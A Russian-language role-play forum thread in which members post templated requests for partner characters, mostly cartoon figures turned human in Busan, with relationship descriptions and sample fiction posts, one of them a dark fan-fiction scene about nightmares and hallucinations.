Рейтинг форумов Forum-top.ru Palantir

сюжет faq о мире внешности мультфильмы объявления на удаление

для корректного отображения дизайна используйте mozilla firefox, проблемы с хромом пытаемся решить
ВАЖНО: проводится смена личного звания; заполнить новые коды нужно в теме с заполнением лз.

Хо-хо, котаны. Мы рады, что вы с нами <3 вот у нас происходит уже вторая смена дизайна, и это, конечно же, повод отметить х3 мы всех дико и безумно любим, от чистого и огромного сердца говорим большое спасибо тем, кто все еще находится на форуме.

Некоторые вполне активно стартанули игру, причем не в каком-то там прошлом, а в самом что ни на есть настоящем. И кто же эти первооткрыватели?

Говоря о флуде, также нельзя не отметить активность пользователей. Вот уже почти добит второй флуд, у многих набрана целая куча сообщений, все друг друга любят и вообще ♥ Ну и кто у нас герои флуда?

тем временем, в настоящем

» Время: октябрь, 10 - 20 числа
» Погода: прохладно, к концу месяца ожидается снег
» События: на данный момент в игре не присутствуют сюжетные квесты, так что все происходит исходя из желаний и фантазии игроков.

Instinct: a genuine сouple
Вверх страницы
Вниз страницы

SCADIST

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » SCADIST » гостевая книга » нужные персонажи

нужные персонажи

Сообщений 1 страница 24 из 24

1

-> тема для поиска мужских и женских персонажей одна единственная
-> фразы в шаблоне вы можете менять так, как посчитаете нужным; что-то же можете вообще убрать; в заявке обязательно должны находиться такие пункты как "какой ты" и "ты для меня".
-> до начала игры вы можете оставить не более 3-х заявок на нужников
-> мы не придерживаем внешности по нужникам

Ну здравствуй, ты оказался в Пусане. Я давно тебя ищу, ведь ты для меня кто именно?, тебе возраст лет и зовут тебя имя. Наши отношения можно охарактеризовать как какие?.
-> ты относишься к людяммультипликациям (в случае мультика указать кем именно является и название мультфильма)

http://s9.uploads.ru/7EYaf.png
желаемая внешность
-> со мной можно связаться через что?

Какой же ты?
расскажите о необходимом вам персонаже; все, что хотелось бы видеть
Ты для меня...
расскажите о ваших отношений как можно более подробно
Пост
любой свой пост под спойлер

Код:
[quote][table layout=fixed width=100%]
[tr][td]Ну здравствуй, ты оказался в Пусане. Я давно тебя ищу, ведь ты для меня [b]кто именно?[/b], тебе [b]возраст[/b] лет и зовут тебя [b]имя[/b]. Наши отношения можно охарактеризовать как [b]какие?[/b].
-> ты относишься к [b]людям\мультипликациям[/b] (в случае мультика указать кем именно является и название мультфильма)[/td]
[td][align=center][img]изображение[/img]
[i]желаемая внешность[/i]
-> со мной можно связаться через [b]что?[/b][/align][/td][/tr][/table]
[align=center][i][b][size=18][font=Times New Roman]Какой же ты?[/font][/size][/b][/i][/align]

[align=center][i][b][size=18][font=Times New Roman]Ты для меня...[/font][/size][/b][/i][/align]

[align=center][i][b][size=18][font=Times New Roman]Пост[/font][/size][/b][/i][/align]

[/quote]

0

2

Ну здравствуй, ты оказался в Пусане. Я давно тебя ищу, ведь ты для меня лучший друг, тебе 21 год и зовут тебя исин, или просто - лэй. Наши отношения можно охарактеризовать как братюнистые, мы же лучшие друзья.
-> ты относишься к людям  мультипликации (мне, в общем-то, все равно, что вы выберете, просто главное - наша дружеская любовь ♥)

http://24.media.tumblr.com/c1b2ba635ed3a7ce7a614c2deba583d5/tumblr_n0xmd6PExU1rbka0co4_250.gif
чжан исин, экзо
-> со мной можно связаться через гостевую

Какой же ты?
в твоей голове миллиарды самых разнообразных идей. ты тоже разнообразен.
нет и дня, чтобы ты не менялся. каждый раз в тебе что-то новое, что нравится всем твоим знакомым без исключения. у тебя большие связи в городе - ты знаешь каждого второго, но с большим трудом запоминаешь имена. лица сохраняются в твоей памяти, но буквы-слова остаются лишь в исключительных случаях.
ты склонен к разделу людей на своих и чужих, но со всеми общаешься на равных. просто кто-то знает о тебе чуть больше, чем большинство. твоя натура - натура художника, ты слегка рассеян и иногда можешь зависнуть. умеешь смотреть в пространство и залипать - это нормально.
в твоей жизни есть творческий беспорядок, но ты - уверенный в себе, знающий, чего ты хочешь. ты умеешь расставлять приоритеты, решать важные вопросы и помогать другим жить. в тебе есть сострадание к окружающим, правда мне иногда кажется, что это лишь оттого, что большинство из них ты считаешь умалишенными. по тебе трудно сказать, что ты думаешь на самом деле. ты не относишься к типу людей, у которых буквально на лбу написаны их мысли.
ты - безнадёжный бунтарь, особенно когда даешь себе волю. тебе нравится нарушать правила, нравится попадать в скользкие ситуации, нравится ходить по грани. именно поэтому ты берешь меня с собой - на мою голову всегда сыпятся неприятности, а выпутываемся из них мы вместе.
- - - -
за сим - все; это совершенно не обязательно соблюдать, просто показываю вам, каким вижу его сам. вы можете свободно менять характер, для меня главным являются лишь отношения.
Ты для меня...
ты - мой лучший друг. ты - мой, по сути, единственный друг. я цепляюсь за тебя всеми руками и ногами - ты был первым, с кем мне удалось поговорить по душам. ты был первым, кто воспринял все мои отличия как норму. в твоем взгляде не было удивления - сейчас мне кажется, что ты просто, как обычно, слегка заисинил - ты потрепал меня по голове и сказал, что мол, пацан, ты чего ноешь.
с тех пор я почти не ною, а если и ною - ты всегда верно выслушиваешь все мои скорбные завывания.
ты учишь меня жизни, являешься "хёном" - святым, великим, недосягаемым. я хочу быть похожим на тебя, потому что в моих глазах ты невероятен.
мне нравится, что с тобой можно выпить. что можно прийти к тебе без разрешения в пять утра. что можно бедокурить вместе, после убегая от полиции и хихикать вместе в темных подворотнях. я поддерживаю любые твои идеи и решения - чего только нет в твоей голове. а ты, кажется, считаешь меня за младшего брата и периодически возишься со мной. периодически.
чаще мы все же просто вместе сходим с ума.
потому что ты - чжан исин, а я - лухан. и мы просто рождены для того, чтобы устраивать беды вместе.
Пост

тада

Бэмби любит ветер. Ровно также он любит траву под ногами и мягкие листочки, которые смешно щекочат бока. Бэмби, на самом деле, любит все, что его окружает. Он любит природу. Любит друзей. Любит других животных.
Он настолько миролюбив и добродушен, что трудно не симпатизировать ему. А особенно если учесть, что Бэмби - детеныш, у которого еще даже не прорезались рожки. В характере Бэмби - игривость, любопытство, неподдельный интерес к совершенно всему. Бэмби - ребенок, для него многое нормальное.

Когда наступает вечер мир внезапно меняется до неузнаваемости. Легкое головокружение сменяется удушьем, словно происходит внезапная асфиксия. Бэмби задыхается, чувствует, как легкие разъедает какой-то совершенно чужой, насквозь прогнивший воздух. У Бэмби - ноль возможностей нормальной жизни, грязь оседает где-то внутри, покрывая все оболочкой, и, кажется, еще немного и он рассыпется на молекулы и атомы.
В голове что-то щелкает и словно ластиком проходит по воспоминаниям, удаляя излишки.
Бэмби не любит ветер только лишь потому, что он уничтожает его самого. Изнутри. Потому, что ветер какой-то слишком злой, колючий и совершенно не ласковый. Потому, что у ветра тяжелый осадок выхлопных газов и каких-то странных испарений. Бэмби, внезапно, не любит все то, что творится вокруг. Это неприятно давит на плечи, тяжким грузом ложится, не дает встать в полный рост, на все. . . две? конечности.
У Бэмби - какой-то слишком внезапный приступ паники, когда хочется забиться в дальний угол - не смотрите на меня, не трогайте меня, оставьте меня в покое. Но он как-то странно теряется, осматривается по сторонам, распадаясь на части и собираясь воедино - во что-то новое и совершенно неизвестное. Ему страшнее от неизвестности внутри самого себя куда больше, чем от внешнего мира.
Из окна пробивается слабый солнечный свет - видимо и в этом месте время движется к ночи. Ночь - время страхов, не самый удачный момент для переселения в другой мир.
Бэмби слегка подтрясывает, взгляд обеспокоено рассматривает комнату, в которой он оказался. Голова отказывается думать - Бэмби наполняется заново, чем-то непонятным. Словно уходит куда-то он прежний и на место его приходит что-то сродни новой жизни. Только так не бывает - даже дети не верят в такую странную ересь.
- Я... - он замолкает, услышав собственный голос. Опуская голову вниз он видит странные - кажется, человеческие - руки, тонкие пальцы и запястья, кожу, сквозь которую видны голубые вены. Он видит маленькие ладони - он кажется сам себе маленьким, хотя на пару размеров побольше того, который был изначально. Мир неправильный - он смотрит на все сверху вниз, но чувствует, что высота его обманчива.
Бэмби смотрит на ореховые глаза напротив и сердце как-то резко бухает вниз, он застенчиво отводит взгляд - краем сознания думает, что вот уже первая истинно его черта, ибо себя собой он не ощущает совсем никак. Он - пластелин, что внезапно мнется и превращается во что-то другое.
- Тоесть... - Бэмби как-то странно мнется, пребывая в растерянности.

+3

3

Ну здравствуй, ты оказался в Пусане. Я давно тебя ищу, ведь ты для меня еще не ясно кто, но разберемся, ты выглядишь на 23 года и зовут тебя Kwon Ji Yong. Наши отношения можно охарактеризовать как доверительные О.о.
-> ты относишься к мультипликациям/Cendrillon/Золушка

http://s8.uploads.ru/ygkp7.gif
G-Dragon
-> со мной можно связаться через гостевую и лс

Какой же ты?
В первую очередь скажу, что я не жду, банального Джейди. Я очень часто за ними наблюдал, иногда, правда, были интересные анкеты, в большинстве случаев – пантовый мальчик из золотой молодежи. НОУП. Я пропишу все в отношениях, но я не зря за образ беру Золушку (не смейтесь, здесь так можно, будете моим Синдереллом XD). Вы не обязаны вечно играть забитого мальчишку, характер должен быть, тем более он постепенно приобретается и адаптируется к этому миру.
Итак, каким я вижу персонажа? Я вижу его очень искренним, тем, кто может расположить к себе, и временами покорять своей святой невинностью. Естественно он умеет готовить, убирается на совесть, все же прототип Золушки, а именно для этого Сынхён его и заказывал. Милость милостью, но характер все равно будет свой показывать, когда к его труду относятся совсем неуважительно. Поначалу может испытывать страх перед самим Сынхёном (все же он у меня персонаж слишком…похож больше на отрицательного, почитаете анкету), а потом научится давать и отпор, и тыкать носом в его собственные косяки. То есть, я веду к чему, к тому что персонажи около года будут жить вместе, и первые полгода будут сложными, вторые полгода почти как у семейной пары, можете в меня даже носками разбросанными кинуть, ну :д
P.S.: не люблю когда пишут посты от 1-го лица (((

Ты для меня...
Наслышанный друзьями о чуде чудном и что оно воспроизводит сказки в реальность, Сынхён, естественно, как и большинство в эту чушь не поверил, но проверить решил. Сумму запрашивала ведьму большую, нашего Таби это даже смешило, сам факт того что он выбрасывает деньги на ветер лишь бы уличить  «ведьму» в шарлатанстве. Когда его спросили, кого он хочет получить взамен на эти деньги, Сынхён просто пожал плечами со словами:
- Да уборщицу было бы неплохо завести. Золушку давай.
Кто же знал, что вместо милой и невинной девицы она вручит ему, вообще левого парня? Брать он его не хотел, зачем ему парень в доме? Но…ведьмы след простыл, а то, что напротив него стоял…именно Золушонок, Сынхёну верилось с трудом. Он скептично позадавал ему пару вопросов, с книгой то сошлось, но отчего-то Таби решил что ведьма – все равно шарлатанка, а этот парнишка – шизофреник. Он просто оставил его там, где ему передали этого «Джиёна Синдереловича», и…не на какие крики «пошел вон, отстань, сдам тебя в больницу/полицию, прекрати идти за мной» не действовали на этого парнишку, который шел за ним как привязанный, объясняя, что он действительно персонаж из сказки, и что больше тут никого нет, кроме…Сынхёна который его «заказал».
С этого все и началось. Дома он его поселил, все объяснил: его лучше не трогать когда он пишет, не попадаться под горячую руку, не лезть в его дела, не трогать бумаги и не выкидывать ни одной бумаги в доме без его согласия.
Как я говорил ранее, отношения постепенно изменились. Джи может и огрызаться, и психовать, и кричать на Сынхёна, особенно в моменты беспробудного пьянства и творческого кризиса. Естесно, мне это не нравится, хоть все равно неосознанно прислушиваешься к человеку. Думаю, что в один момент Джи может не выдержать и сказать что уходит, и действительно уйдет,…но все равно не на долго. Думаю пока на этом всё, «насколькомыдружнынедружнылюбовьдогробаангстипростопопойки» – решим по факту прихода, никого и ничем не собираюсь обременять. Хотя….мне бы было приятно если бы вы меня слепо и тихо любили :д 

Пост

Никогда не любил понедельники, наверно, как и большинство людей на всей планете, всегда именно в этот день недели выпадает куча всего ненужного. И просыпаешь все на свете, и горячей воды нет. Проснувшись, Сынхён еще минут 15 заставлял себя подняться чтобы принять душ и вообще куда-либо выбраться из своей квартиры, и когда он все же поднялся, то наверно уже не удивительно что он попытался принять душ, и первым делом его огрело потоком ледяной воды, и никакого намека на горячую не последовало. День не задался. Пришлось вспоминать правила выживания, и для этого нужно былл кипятить воду, потому что в любом случае, день без душа – это плохой день. Хотя стоит отметить, что холодная вода его взбодрила.
Когда ему все же удалось с трудом, но все-таки принять горе-душ, то Сынхён почти сразу одел свой костюм, застегивая на руке часы и сверяясь со временем: у него были лишние минуты на завтрак, и даже можно было не торопиться.
У Сынхёна не большая практика, не настолько железный кулак с учениками, и сейчас он наверно мог сказать, что понимал своих учителей в школе, только в США не было такого уважения, как тут в Корее и в данной академии. Но ни смотря на это, работа легче не становилась. Зато сейчас Сынхён мысленно просил у всех своих учителей прощения, ведь у них все-таки не такая простая работа, и дело даже в потрепанных нервах, времени, а в том что ты вкладываешь знания в молодые головы. И быть может литература не такой важный предмет, как например математика или физика, или те же самые иностранные языки, но от этого он не становился совершенно бесполезным.
Отпивая сваренный кофе, парень параллельно просматривал расписание на сегодня, главное ничего не перепутать. Было неудобно то, что у одного класса проверочная работа, у другого новая тема, а у третьего он вообще ведет в первый раз, и чтобы ничего не забыть в суматохе, казалось лучшим вариантом взять все. Он сложил пару учебников, распечатанный со вчера материал, свои личные вещи, и вот черт его дернул вновь глянуть на часы и решить, что он может позволить себе еще чашку кофе? В скором времени это кофе оказалось и на его рубашке, и на его пиджаке. Помнится, я уже говорил, что день не задался? Несколько секунд он просто держал чашку в руке:
- Спокойно, спокойно, спокойно, - проговорил он вслух для себя, немного прикрывая глаза и выдыхая воздух, стараясь сделать это расслабленно, и…не разбить, к примеру чашку, из-за неудачного дня, который с каждой минутой становился все хуже и хуже. Стоит ли говорить о том, что нормальный костюм был в химчистке, а остальные либо не годились для академии абсолютно, либо в них попросту было жарко. Пришлось одеться по старинке, светлый верх, темный низ, надеясь на то, что никто не сделает ему замечание словно школьнику, хотя конечно не гоже преподавателю ходить в подобной одежде.
Неудачный день дополнился тем, что он начинал опаздывать. У него было еще время, но он только шел к машине, хотя на самом деле должен был быть на полпути к академии. Но он же никогда не опаздывал раньше? Один раз – ничего страшного. По-крайней мере он на это искренне надеялся. Когда он все-таки добрался до пункта назначения, он уже почти опоздал на урок, и оставив машину на парковке, он быстрым шагом поспешил во внутрь академии. Было довольно тихо, совсем не удивительно, большинство уже разошлось по коридорам и кабинетам. Сынхён остановился, раскрывая папку чтобы уточнить в какой кабинет и вообще у какого класса сейчас пара, и только он просмотрел пару отпечатанных строчек, как в него кажется кто-то врезался. Это было настолько неожиданно, что он правда не понял, что произошло, почувствовал лишь резкую боль и сильно пошатнулся, выпуская из рук все свои талмуды, хотя «выпуская» - это мягко сказано, их практически выбило из рук:
- Аккуратней, - первое что он произнес, проводя ладонью по своему плечу, и обращая внимание на виновницу всего этого торжества, а потом на то, что ближайшие пару метров были усыпаны листами из его папки, которые хаотично разлетелись, и перевёрнутыми книгами, и все бы конечно ничего, если бы его не сбила с толку наглость этой девицы. Уж поверьте, подобного обращения к себе он не слышал тут ни единого раза
- В следующий раз я обязательно лягу посреди дороги, - невозмутимо ответил он на ее реплику, все же присаживая на корточки, и собирая все предметы подряд, поочередно отсеивая, что казалось принадлежало ему, и что принадлежало ей. Это было даже забавно, отчего-то, ни смотря на весь от души испорченный день, эта девушка его сейчас веселила, так как явно не признавала в нем учителя, ну или хотя бы того, кто явно ее старше. Может стоит взять за практику иногда одеваться не в деловые и официальные костюмы, а вот так, как сейчас?
- Ты меня так отчитываешь, словно я младшеклассник, может стоит еще к заучу отвезти? – откровенно шутил Сынхён, все-таки ожидая извинений и ее смеха в ответ, когда она на него внимательно посмотрит и все-таки поймет, что перед ней явно не ее ровня, но чуда не произошло, и он даже как-то немного растерялся, видимо это дало новый повод незнакомке, чтобы показать насколько она может быть остра на язык, ну или может ее и правда так расстроила вся ситуация
- Это определенно мое, - вздохнул он, собирая листы бумаги формата А4, где была описана программа занятий, и все это обратно складывая в свою папку, но все же немного улыбнулся, смотря на девушку которая судорожно разбирала все книги, а потом и вперилась в него гневным взглядом – о, расслабься, разве хмурые брови не ведут к образованию морщин? – вальяжно махнул он рукой в воздухе, словно намекая, на ту всякую подобную женскую шушеру, ну и позволил себе так же пообщаться с ней никак с ученицей, хотя что-то ему подсказывало о том, что они еще встретятся.
Когда раздался звонок, кажется они одновременно подняли головы, и вот тут остатки книг и бумаг, были практически поделены по братски
- Черт, - тихо проговорил он, подбирая оставшиеся вещи, и решая все-таки помочь еще и девушке, дабы поднять книгу, которая лежала ближе к ней, за что он случайно (по-крайней мере он на это надеялся) получил ее же головой по своему подбородку, и несколько болезненно рассмеялся, ну это уже ни в какие ворота не лезет – ты наверно решила меня сегодня добить, - проговорил он, потирая подбородок, и все-таки поднимаясь на ноги – камень преткновения к знаниям, говоришь? Я запомню, мне нравится.

Отредактировано Choi Seung Hyun (2014-02-13 21:48:31)

+2

4

Ну здравствуй, ты оказался в Пусане. Я давно тебя ищу, ведь ты для меня детская любовь, тебе 23 года и зовут тебя Kim Joon Myung. Наши отношения можно охарактеризовать как псевдосемейные.
-> ты относишься к мультипликациям// Lion King, Simba

http://s9.uploads.ru/08rmb.gif
Kim Joon Myung [Suho]
-> со мной можно связаться через лс или гостевую

Какой же ты?
Ты один из тех людей, которые четко представляют своё будущее у себя в голове - что будет завтра, через неделю, месяцы, год. Но также числишься в ряду плохих предсказателей, угадывая свою нелегкую судьбу один раз к ста. Ты наивно веришь своему шестому чувству, которое у тебя очень плохо развито. В твоей жизни случаются такие события, которые ни разу не ожидаешь. Эти крутые повороты на вроде такой гладкой, ровной и предсказуемой жизни выматывают. Не любитель споров: тебе проще просто пойти на уступки перед человеком, чем лезть на рожон, не смотря на то, что на самом деле прав ты. Довольно-таки вежливый, никогда не останется в долгу, предпочитает как можно быстрее вернуть долг, а не ждать, пока другого человека торкнет. Ты все равно поможешь ему, должен тот тебе или нет. Тебе на самом деле не нравится чувство долга перед кем-то, будто это родители или друзья. Обычно ты злишься по этому поводу, когда тебя упрекают и говорят, что должен.
Ты для меня...
Мне ты просто хороший друг, хотя порой создается впечатление, что мы женатая пара, которая живет вместе больше 10 лет, вместо наших скудных 2 лет. Эти вечные утренние сонные обнимашки, когда ты обнимаешь меня со спины, пока я готовлю, вечерние просмотры кино и куча всего, что обычно делает влюбленная пара. Но мы не такие. Я выбрал именно тебя потому, что влюбился в тебя еще в далеком детстве, в непутевого мальчишку вначале и величественного парня потом. Ты был детской мечтой, которая осуществилась спустя многие годы.
Пост

+

сегодня-завтра будет

0

5

Ну здравствуй, ты оказался в Пусане. Я давно тебя ищу, ведь ты для меня мой владелец, спаситель, друг и первый в жизни человек, который захватил моё сердце, тебе 23 года и мне все равно как тебя зовут, для меня ты Ривай. Наши отношения можно охарактеризовать как дружеские, переходящие в любовные, переходящие в статус "всё слишком сложно".
-> ты относишься к людям

http://s9.uploads.ru/pleAu.gif
на ваш выбор, лучше, если решим вместе
-> со мной можно связаться через гостевую, потом лс, потом аська, потом если что скайп, а вообще я могу сразу кинуть вам вк

Какой же ты?
Наверное, моя заявка вообще покажется очень странной, но если смотреть с другой стороны, то я оставил всё на вас, вы можете сами выбрать себе внешность, деятельность, характер и историю. Всё же вам играть за персонажа, я могу лишь дать набросок, но вы художник и вам решать какой картина будет.
- - - - - - - - - - - - - - - - - -
Своей яркостью, своим характером ты всегда напоминал мне мою первую хозяйку - Пенни. Она тоже любит животных, так же как и ты, она любит фотографировать, так же как и ты. Вы так похожи и мне всегда очень больно на душе, когда я смотрю на тебя, перед глазами всплывает лицо Пенни, её большие глаза, добрая улыбка, я вспоминаю её голос. Мне так больно смотреть на тебя, мне больно потому что я не должен был быть здесь, я должен был спасать свою хозяйку, но я здесь. Из-за ведьмы я здесь, живу вместе с тобой, слушаю и выполняю всё что ты мне скажешь.
Ты очень яркий, ты такой отзывчивый, ты такой светлый. Ты обожаешь собак, когда мы впервые встретились ты сразу же рассказал мне почему ты выбрал именно меня. В раннем возрасте у тебя погибла собака, не умела плавать и утонула, а ты ничего не смог сделать. не смог побороть страх перед глубиной. Я видел как солёные капли скатывались по твоему лицу и мне просто стало тебя жаль, все же ты не виноват, что я теперь здесь, а не с Варежкой и Рено.
У нас режим. Я рассказал тебе подробно, что мне нужно обязательно делать и вот за всё это время мы не разу не нарушили этот режим. Ты специально, ради меня встаешь очень рано, готовишь завтрак из обычных хлопьев и теплого молока, потому что это моя любимая пища, потом мы собираемся на прогулку, ты частенько берешь с собой мяч или диск, чтобы поиграть со мной, иногда ты берешь мангу, которую очень любишь читать. Больше, чем простые книги. Ты любишь мангу, а ещё и меня в это втянул! Из-за тебя я теперь хочу стать мангакой и просто не покладая рук рисую, чтобы у меня наконец что-то достойное получилось. Ты засранец. Из-за тебя у меня появились другие мечты, кроме освобождения Пенни.
Ты частенько берешь меня на свою работу, ты считаешь, что мне лучше всегда быть с тобой рядом, а я не против. Мне очень приятно, я вообще рад ,что ты проявляешь ко мне столько внимания. Я стараюсь тоже быть очень внимательным к тебе, но, кажется, тебе это совсем не нравится. Однажды, когда ты резал овощи ты порезал палец, а я просто решил тебе помочь, чтобы ты не чувствовал боль. Да, всё же, наверное, лишним было слизывать твою кровь, но я просто ещё не привык ко всему этому. Я надеюсь, что ты мне прощаешь за мои собачьи закидоны, а если нет, то прости пожалуйста. С меня твой любимый десерт.

Ты для меня...
Ты мой друг, мой товарищ, мой спаситель, мой нынешний хозяин. Да, я не постесняюсь говорить, что ты мой хозяин. Я твой верный пес, я готов пойти за тобой хоть куда, я хочу следовать за тобой хоть на край света, больше я не посмею терять близких мне людей.
С самого знакомства отношения у нас были непростыми, ты часто много чего у меня спрашивал, о моем мире, обо мне самом, о том, как мне жилось в моем "рисованном" мире, а всегда только пожимал плечами, строя угрюмую мордашку. чтобы от меня наконец ты отстал. А ты всё равно разговаривал со мной, ты был рядом, все эти дни, пока я осваивался у тебя тебя, привык к тебе ты всегда был рядом, проявлял заботу, потому что волновался, что я могу сбежать. Я бы не сбежал, даже, если бы хотел - не сбежал бы, однажды я уже убежал от своей хозяйки, но больше этого не повторится, я же смелый суперпес! Я же Вольт! Я не сбегу больше.
Первый и нормальный разговор начался у нас вообще очень спонтанно. Ты читал мангу "Вторжение Гигантов", а меня как "любопытную личность" заинтересовало, что же ты читаешь. Я решил подойти к тебе и заглянуть, но ты сразу же отдернул руки, не давая мне заглянуть в "книжку". Мы так игрались минут пять, пока ты все же не решил мне показать, что ты там читаешь. Меня так заинтересовала эта манга, что я сразу же попросил, чтобы ты мне её почитал. Именно после этого наши отношения стали на один уровень выше. Мы стали больше общаться, ты больше не боялся того, что я могу убежать от тебя, мы подружились, просто взяли и подружились. Так легко, так просто.
Ты меня уже не помню сколько времени учишь манерам, потому что мои собачьи манеры тебе не по вкусу. Плохой ты.
Я зову тебя Риваем, я перечитался манги и пересмотрелся аниме, для меня ты истинный Ривай, намного выше, конечно, но всё равно Ривай. А ты мне в шутку говоришь, что я адская смесь Эрена и Жана. Мы с тобой вообще такие странные, брр. Как это нас ещё в психушку не забрали?
Когда я начал испытывать к тебе что-то большее чем привязанность? Когда я начал просто зависеть от тебя? Когда я пересилив себя перестал засыпать с тобой в одной комнате, потому что боялся, что сделаю или наговорю что-то лишнее? Ривай. Капрал. Мой. Я так тебя люблю, но совсем не знаю как выражать любовь, я так боюсь, что ты меня не любишь и относишься ко мне только как к другу.

Пост

пост

Доктор, заберите меня, доктор, спасите меня от темноты. Доктор, почему вы мотаете головой? Вы же доктор, вы должны помочь мне. Мертвецы забирают меня, они хватаются за меня, словно я единственный источник их свободны. Спасите меня, доктор. Я устал. Я распадаюсь на куски, словно старая ваза, я не чувствую себя. Меня пугает это. Я не уверен, что это реальность. Может быть я сплю, доктор? Может мне снится кошмар? Мне нужен доктор. Я вижу мертвецов, я вижу души ушедших, мне нужна помощь. Я устал, повторяю, я устал, я хочу отдохнуть от всего этого. Пусть это делает кто-то другой, не я, я не хочу больше видеть всё это, я хочу чувствовать себя как нормальный человек. Уберите это из моей головы, заберите мои мысли, украдите мою душу, но верните мне самого себя, я хочу ощутить свободу. Я не хочу быть рабом жизни, вашим рабом, я хочу быть свободен. Заберите меня кто-то, я у с т а л.

Я с о ш е л с у м а.
Истерий с четырнадцати лет мучается от всех этих кошмаров, от видений и просто обманок зрения, он так устал от всего этого. Хочется просто спрятаться от всего этого, но это не так просто, тебя найду. Всегда его находят и эта улыбка. Улыбка темного человека с рогами, она такая пугающая, подточенные зубы, слово акульи, он бы с легкостью прогрыз мне горло. Думал Истерий, когда видел это воображаемое существо с улыбкой на ужасном лице. О том что Истерий видит разные странности знали его друзья, Карантина узнала об этом первой по одной случайности, которую Гломову совсем не хочется вспоминать. Иногда Гломову хочется просто уйти, упасть в руку темному человеку и исчезнуть, потому что он уже не мог больше это терпеть. Он так устал, он не спит ночами потому что ему снятся кошмары, он не ходит на занятия потому что просто не может подняться с кровати. Ему однажды сказали, что если так будет и дальше продолжаться его просто "выпрут из школы". Тибидохс. Милый Тибидохс - детская мечта Гломова, он так сюда хотел попасть, а теперь есть шанс, что он отправится опять в мир лопухоидов. Так что и это сильно давило на Истерия, он не хотел покидать школу, он не хотел уходить от сюда, от друзей, которых здесь нашел, от воспоминаний, которые были у него.
L O S E Y O U R Ɑ И I M
Не теряй себя, будь собой и живи. Вот слова, которые брюнет повторял себе каждую ночь, чтобы уснуть, чтобы знать и помнить, что он должен всё это выдержать. Должен, но шансов выдержать это всё слишком мало. Истерий помнит как пожелал спокойной ночи соседу по комнате, помнит как положил голову на мягкую и большую подушку, помнит, что закрыв глаза он забыл всё. Истерий не помнит как поднялся с кровати, не помнит, как вышел с комнаты и начал бродить по пустым коридорам учебного заведения. Его глаза смотрели в упор, смотрели сквозь, голос в его голове говорил ему что нужно делать, куда нужно идти, но он не отвечал на опрос Гломова "зачем?". "Зачем туда идти?", но в ответ парень ничего не слышал, голос в его голове не отвечал на этот глупый вопрос, голос в его голове продолжал говорить ему "иди, следуй, будь", повторял это словно читал молитву. Быстро, твердо и решительно. Давит. Давит. О ч е н ь давит на мозги.
- Зачем мне мозги? Я не хочу, чтобы мне кто-то щебетал в голове что я должен делать. Я устал, - тихо шепчет Истерий, опираясь одной рукой о стену. Сложно идти, голова просто раскалывается, такое чувство что на нем использовали какое-то запрещенное заклинание и теперь наблюдают за Гломовом, словно он загнанная в угол крыса, животное для экспериментов.
- Ты думаешь не о том. Оглянись, - советует ему голос в его голове и парень с великим трудом поворачивает голову в сторону и перед собой он видит того самого темного человека. Он машет ему рукой, Истерий видит лицо темного человека благодаря факелу и огню, который освещает лицо и сам силуэт темного человека. Темное создание мотает головой и идёт вперед, несколько секунд Истерий стоит как вкопанный тяжело дыша. Черт. Черт. Черт. Опять одно и тоже. Гломов идет за темным силуэтом, он следует за смертью, следует за своим Дьяволом. Водит рукой по стене, он хочет остановится, хочет прекратить всё это, но что-то не дает ему это сделать.
- Следи. Иди за ним, - повторяет голос в голове, тихий и хриплый, в этой тишине голос в голове пугает, пугает так что Истерий вздрагивает и дергает плечами, чтобы снять накатившие напряжение.
- Я хочу отдохнуть, - голос Истерия звучит странно, услышав свой голос темному стало противно. Испуганный, запуганный, словно драный кот. Как так? Почему так? Почему он такой слабак?
Гломов следует за темным силуэтом, а тот всё движется и движется. Куда он идёт? Зачем он зовет с собой Истерия? Что он хочет показать? Брюнет задерживает дыхание, когда темный силуэт растворяется в темноте. Что делать? Куда дальше? Эмпат останавливается и чувствует что кто-то дышит ему в спину. Страшно. В голове звучит тот самый голос, он говорит не поворачиваться, он говорит что нужно идти дальше и не оборачиваться назад. Истерий даже в такие моменты был очень любопытен и не послушав мерзкий голос в своей голове, брюнет смело поворачивает голову и замирает. Это похлеще любых ужасов. это куда серьезней. Лучше бы он послушал этот ужасный голос. За его спиной стоял тот самый черный человек, но выглядел он куда ужасней. Если бы не свет от факелов Истерий бы точно утонул в этой темноте. Его пугает не сам человек, его пугает лицо этого "темного человека". Без черт, один рот. Черный человек словно читает мысли Истерия и приоткрывает рот показывая ужасный и длинный язык.
Не выдержав вот такого поворота событий Истерий разворачивается и быстро ступает босыми ногами по полу.
Сколько времени он идет уже по пустым коридорам? Сколько ещё он будет слушать этот голос в его голове? Он говорит, что нужно идти, что нельзя оборачиваться или ты проиграешь. Перспектива проигрыша уже не радовала Гломова, он не хотел проигрывать, потому что не знал что может ждать его после. После увиденного он не сдержал слезы, иногда так хочется самому себе выколоть глаза и больше не плакать, чтобы больше никто не посмел назвать его плаксой. Мутным взглядом он смотрит в темноту, потирает красные от слез глаза и смотрит перед собой. Ему холодно. Только сейчас он понимает, что вышел из своей комнаты в одних трусах.
- Может завтра в таком виде заявишься на урок? Думаю тебе сразу же отпустят, Истерий.
Гломов недовольно фыркает, не будет он на уроки в таком виде заявляться, он ещё не так сошел с ума. Мысленно Гломов говорит, чтобы этот голос заткнулся и на время и вправду брюнет ощущает тишину. До того времени, пока он не услышал чужие шаги.
Раз. Два. Три. Истерий чувствует что этот кто-то скоро приблизится к нему, но в голове эти звуки слишком громкие, он не ориентируется, он просто не понимает откуда появится этот "кто-то". Развернувшись парень увидел знакомое лицо. В сотый раз Истерий говорит спасибо за освещение, хотя бы какое-то освещение. Во всем этом мраке Гломову удается разглядеть лицо своего знакомого. Своего друга. Да, друга.
- Ягун? Это ты? - тихо спрашивает Истерий, нервно облизав губы. Да что с ним творится? Как же это достало, почему он всегда боится? Он ученик темного отделение, темное отделение "славится" своей холодностью и хоть какой, но жестокостью. Так. Почему. Я. Так. Боюсь. Голос в голове смеётся, а Истерий бьёт руками по вискам, пытаясь избавится от этого ужасного голоса в голове.
- Замолчи, - шипит Глом, сжав пальцами волосы, Истерий нервно смотрит на Афанасия и наклоняет голову в бок. С Ягуном что-то не так, Гломов пытается присмотреться, но мутные глаза ничего не видят. Или просто не хотят видеть?
Когда Ягун подходит ближе, Истерий ощутимо вздрагивает и отходит от друга. Теперь ясно что он ощущал.
Он видит перед собой окровавленного Ягуна, на его лице кровь, на его одежде кровь. Истерий не любит красный цвет, он пугает своей дикостью и сейчас видя перед собой друга в крови, Гломов облокотился плечом о стену.
